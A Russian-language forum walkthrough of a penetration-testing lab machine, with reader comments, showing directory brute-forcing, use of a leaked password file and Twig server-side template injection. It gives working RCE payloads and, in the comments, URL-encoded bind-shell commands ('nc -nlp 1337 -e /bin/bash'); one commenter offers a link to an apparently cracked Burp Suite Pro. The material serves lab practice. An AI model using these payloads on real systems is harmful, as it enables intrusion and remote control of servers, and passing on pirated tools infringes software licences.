Предыдущая глава
Следующая глава
Оглавление

https://forum.antichat.xyz/attachmen...e48ba2aced.png

Доброго времени суток друзья) Сегодня настало время очередного токена. А так же на этом таске мы попрактикуемся в таком интересном векторе атаки, какTemplate Injection Server Side ,и как обычно качнем немножко свое логическое мышление) Речь пойдем сегодня оHall-Of-Fame(192.168.0.8) машине на топологии сети.

Сперва как всегда для удобной работы пробросим порт:

https://forum.antichat.xyz/attachments/4768291/1.png

Далее знакомимся с веб приложением,гуляем по ссылкам,наблюдаем за поведением контента,изучаем передаваемые параметры и т.д:

https://forum.antichat.xyz/attachments/4768291/2.png

Видим что GET-ом передается параметр hnameи это очень похоже на то что там может быть LFI(Local File Inclusion) Но несколько часов я долбился в поисках этой уязвимости и увы безрезультатно...
Затем на ум пришло побрутить директории и файлы на этом веб сервере..
Тут стоит обратить внимания на инструмент которым мы будим брутить директории. Конечно можно и обычным dirbuster-ом пробрутить,но лично мне нравится очень инструмент dirsearchкоторый как по мне в разы быстрее чемdirb или dirbuster)
Прогоняем этой утилитой наш зал славы(Hall-Of-Fame)

https://forum.antichat.xyz/attachments/4768291/4.png

Находим интересную две интересные папки
/backup
и
/dev
Пробуем зайти на /dev
Нас встречает тамBasic Auth аутентификация:

https://forum.antichat.xyz/attachments/4768291/8.png

Пробрутив директорию /backup находим файлик passwords.txt:

https://forum.antichat.xyz/attachments/4768291/5.png

В этой папке находим файлик с паролями,смотрим его.

https://forum.antichat.xyz/attachments/4768291/6.png

Пробуем залогинится на /dev. Но увы не один логин пароль нам не подошел
Пробуем зайти на основной странице:

https://forum.antichat.xyz/attachments/4768291/7.png

Наблюдаем и изучаем поведения контента после успешного логина под пользователем creator:

https://forum.antichat.xyz/attachments/4768291/9.png

Ковыряли ковыряли,ничего не наковыряли... Не нашел я ничего тут...
Пробуем под другим пользователем залогинится:

https://forum.antichat.xyz/attachments/4768291/10.png

А тут после логина нам вернуло какой то масив с данными:
https://forum.antichat.xyz/attachments/4768291/11.png

Видим путь /dev/ и пароль 0bf190ffdc397fd51334d908845fbb1
Вспоминаем что по пути /dev у нас была аутентификация,идем туда и пробуем наш пароль под известными нам учетными записями.Но почему то нас не пускает ни под одной учетной записей..
Посидели,успокоились,подум али...
Тут включаем логику и начинаем думать о том какие еще могут быть учетные записи разработчика(developer), пробуем логин dev (сокращенно от developer) и наш полученный пароль и попадаем в каталог разработчика и видим что визуально поведение контента ничем не отличается:

https://forum.antichat.xyz/attachments/4768291/12.png

Хм... Странно...
Кавыряемся,кавыряемся, паралельно запускаем сканеры уязвимостей,пускай работают.
Ну и на выходе сканер находит нам весьма интересный вектор уязвимостей:

https://forum.antichat.xyz/attachments/4768291/14.png

Видим что в параметре hname нашло Template Injection и определило тип шаблонизатораTwig.
Server Side Template Injection - вектор атаки построен на принципе внедрения шаблона.
Вообщем гуглим вектор,вооружаемся знаниями и пробуем эксплуатировать.
Я расписывать не буду про этот вектор,так как очень доступно,подробно и хорошо об этом векторе расписано в этой_статье
Прочитав статью пробуем выяснить для практики и закрепления знаний попробуем выяснить тип шаблонизатора,не смотря на то что сканер сделал это уже за нас(всегда нужно стараться понимать тот или иной вектор уязвимости), самостоятельно по вот этой схеме:

Помним что у нас уязвимый параметр hname, валидируем вектор:

https://forum.antichat.xyz/attachments/4768291/15.png

Видим что мы передали GET-омhname=DarkNode {{7*'7'}} И нам вернуло в теге DarkNode 49
Значит и вправду шаблонизатор Twig. Это все хорошо) Идем дальше)
Читаем внимательно статью и находим там уже готовый шаблон дляRCE под шаблонизатор Twig:
Документация говорит, что Twig имеет обьект _self, который имеет атрибут env (является ссылкой на Twig_Evironment).В процессе чтения документации, мы приходим к рабочей полезной нагрузке{{_self.env.registerUndefinedFilterCallback(«exec »)}}{{_self.env.getFilter(«id»)}}

Пробуем нашуполезную нагрузку:

https://forum.antichat.xyz/attachments/4768291/16.png

Ну вот вектор готов) Осталось бросить удаленный шелл и забрать токен)
Так как ssh(172.16.0.8) машина и Hall-Of-Fame(192.168.0.8) у нас находятся в разных сегментах сети,то тут мы сможем сделать только Bind Shell(Кто не понимает различие междуBind и Reverse шеллом - прочтите моюстатью)

https://forum.antichat.xyz/attachments/4768291/17.png


https://forum.antichat.xyz/attachments/4768291/18.png


https://forum.antichat.xyz/attachments/4768291/19.png

Всем спасибо)
Помни! Если понравилась статья - жмакни лайк , мне будет приятно)

Предыдущая глава
Следующая глава
Оглавление

Словарь для подбора файлов на сервере составлялся самостоятельно или брался за основу уже существующий, проверенный временем? =)

Нет,дефолтный словарь который идет вместе с dirsearch.py

Огромная благодарность за dirsearch - скорость работы с дирбом в разы выше. отличная утилита!

Я использовал owasp-zap сканер, он тоже обнаружил данную уязвимость, но вопрос по утилите Burpsuite - как понимаю в данном случае это версия Pro и Pro открывает доступ к нетолько сканеру, но и другим возможностям. Но вопрос - технология сканирования разная или схожая, а Pro версия была приобретена ради доп функция Burpsuite?

Ну приобретена - не совсем подходящее слово) Да в Про версии есть сканер и да ,брутфорс быстрее работает,расширять дополнениями можно + другие интересные плюшки)
Могу поделится) Мне не жалко)
[hide=15]https://mega.nz/#!zkUSQYDT!gnWUOzOJzUlxWsVhqT_k6rsXOHgePkC9odFBvTM 83B8

И совсем корявый вопрос =) http://127.0.0.1/dev/index.php?hname={{_self.env.registerUndefinedFilte rCallback("exeс")}}{{_self.env.getFilter("nc -e /bin/bash -nlp 1337")}}
Однако ....сырец выдает
”." class="error">Top of the most famous hackers - | GDS



Так как сработало у автора топика, у меня нет сомнений в моей ошибке, однако в чем. Порты проброшены, ресурс отвечает, защиту от xss отключил ( аддон по умолчанию в Моззиле). В чем проблема может быть? Браузер? неверная строчка? Упущена какая то мелочь?

ПС За Burp отдельный респект и уважени!

Попробуй сначала получить вывод команд id,pwd
Если и эти не отработают - знач где то косяк.
{{_self.env.registerUndefinedFilterCallback("exec" )}}{{_self.env.getFilter("id")}}

Что касается нетката - то после команды:

{{_self.env.registerUndefinedFilterCallback("exec" )}}{{_self.env.getFilter("nc -nlp 1337 -e /bin/bash")}}

Браузер должен крутить колесико загрузки страницы пока не будет подключение от машины ssh(172.16.0.8)

Ты же с 172.16.0.8 подключаешся неткатом?

1) ssh на 192.168.101.9
2) nc 192.168.0.8 1337
связи нет

браузер загружается и..просто открывает страницу =)

Если пробовать вставить своей имя - то все ок, в сырце мы его видим.
Пробовал разные браузеры.

Победил эту беду вот так
/dev/index.php?hname=GackGack%20{{7*%277%27}}%20{{_self .env.registerUndefinedFilterCallback%28%22exec%22% 29}}{{_self.env.getFilter%28%22nc%20-nlp%201337%20-e%20/bin/bash%22%29}}

Средний интервал выхода лаборатории примерно пол года.